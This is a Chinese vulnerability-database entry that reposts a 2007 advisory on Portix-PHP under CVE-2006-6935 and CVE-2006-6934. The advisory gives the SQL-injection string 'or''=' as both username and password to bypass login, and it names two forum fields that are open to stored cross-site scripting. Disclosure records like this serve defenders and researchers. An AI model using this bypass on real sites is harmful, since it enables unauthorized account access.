Portix-PHP [login bypass & xss (post)]

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1053062 漏洞类型
发布时间 2007-01-17 更新时间 2007-01-17
CVE编号 CVE-2006-6935
CVE-2006-6934
CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2007010065
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
product:Portix-PHP 
vendor site :http://portix2.be
risk : medium

log with :
username: 'or''='
passwd : 'or''='

xss post on the forum , vulnerable fields  :
titre
auteur

laurent gaffi & benjamin moss
http://s-a-p.ca/
contact: saps.audit (at) gmail (dot) com [email concealed]